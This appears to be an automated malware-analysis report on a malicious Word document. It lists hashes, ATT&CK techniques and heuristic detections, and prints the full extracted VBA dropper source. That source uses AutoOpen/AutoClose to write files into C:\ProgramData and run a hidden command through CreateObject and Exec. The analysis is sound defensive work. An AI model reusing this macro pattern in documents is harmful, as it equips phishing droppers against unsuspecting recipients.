Office (OOXML) malware analysis — malicious · 99d22eb3d584f502

MALICIOUS

Office (OOXML)

380.6 KB Created: 2020-08-11 10:03:00 UTC Authoring application: Microsoft Office Word 14.0000 First seen: 2020-09-07

MD5: bbea719b296b81cb70e294246c9d6eae SHA-1: d79c7c9a0ddc7d3c7d90eb90f47783e999bb7ebd SHA-256: 99d22eb3d584f502292d847497713c8db10f7aa9d2b08f5f6da8e690be4f7832

178 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1105 Ingress Tool Transfer

The sample contains VBA macros with AutoOpen and AutoClose functions, indicating malicious intent. The script attempts to write data to files in C:\ProgramData\Nolewr and C:\ProgramData\Portes, likely to drop a second-stage payload. The presence of CreateObject and p-code execution further supports its role as a dropper.

Heuristics 7

ClamAV: Doc.Dropper.Generic-9823791-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Generic-9823791-0
VBA project inside OOXML medium 4 related findings OOXML_VBA

Document contains a VBA project — VBA macros present

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Matched line in script

Set Hateriklahtduehhdfegtr = CreateObject(ijfuihifuifhuiuifggfyi.Caption)
Hateriklahtduehhdfegtr.Exec Bikoter.DefaultTargetFrame

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Private Hateriklahtduehhdfegtr
Sub autoopen()
```
Auto_Close macro low OLE_VBA_AUTOCLOSE

Auto_Close macro
Matched line in script
```
End Sub
Sub autoclose()
```
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	4742 bytes
SHA-256: `7e7ac6d2eeb28c208b65d57054ded4a21488e1c8e3399c97d61e34e08acc4ae4`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Bikoter" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "Montag" Private Hateriklahtduehhdfegtr Sub autoopen() Open "C:\ProgramData\Nolewr" & ijfuihifuifhuiuifggfyi.Tag For Binary As #1 Put #1, , " " Put #1, , " " Put #1, , " " Put #1, , " " Close #1 Application.Quit SaveChanges:=False End Sub Sub autoclose() Open "C:\ProgramData\Portes" & ijfuihifuifhuiuifggfyi.Tag For Binary As #1 Put #1, , " '7568967735241 " Put #1, , " '1242354686796 '235423523 " Put #1, , " '9789789 '679679679 " Put #1, , " '7568967735241 " Put #1, , " '1242354686796 '235423523 " Put #1, , " '9789789 '679679679 " Put #1, , " '7568967735241 " Put #1, , " '1242354686796 '235423523 " Put #1, , " '9789789 '679679679 " Put #1, , " '756896 7735241 " Put #1, , " '1242354686796 '235423523 " Put #1, , " '9789789 '679679679 " Put #1, , " '7568967735241 " Put #1, , " '1242354686796 '235423523 " Put #1, , " '97897895 '679679679 " Put #1, , " '7568967735241 " Put #1, , " '1242354686796 '235423523 " Put #1, , " '9789789 '679679679 " Put #1, , " '7568967735241 " Put #1, , " '1242354 686796 '235423523 " Put #1, , " '9789789 '679679679 " Put #1, , " '7568967735241 " Put #1, , " '1242354686796 '235423523 " Put #1, , " '9789789 '679679679 " Put #1, , " '7568967 735241 " Put #1, , " '1242354686796 '235423523 " Put #1, , ijfuihifuifhuiuifggfyi.jnfddnfdfdfusdhfshfgfh.Caption Close #1 Set Hateriklahtduehhdfegtr = CreateObject(ijfuihifuifhuiuifggfyi.Caption) Hateriklahtduehhdfegtr.Exec Bikoter.DefaultTargetFrame End Sub Attribute VB_Name = "ijfuihifuifhuiuifggfyi" Attribute VB_Base = "0{516971D7-79FA-4D32-8D9C-546BC29371F8}{51B7ECD6-1ECD-4983-BBA4-0CCF5418A372}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False
`vbaProject_00.bin`	vba-project	OOXML VBA project: word/vbaProject.bin	160768 bytes
SHA-256: `4accc3d74b83f4c203d57e132f5bb4f903c19634c780375b60300e0666dd560c`

Open this report in the interactive analyzer, or submit your own file for analysis.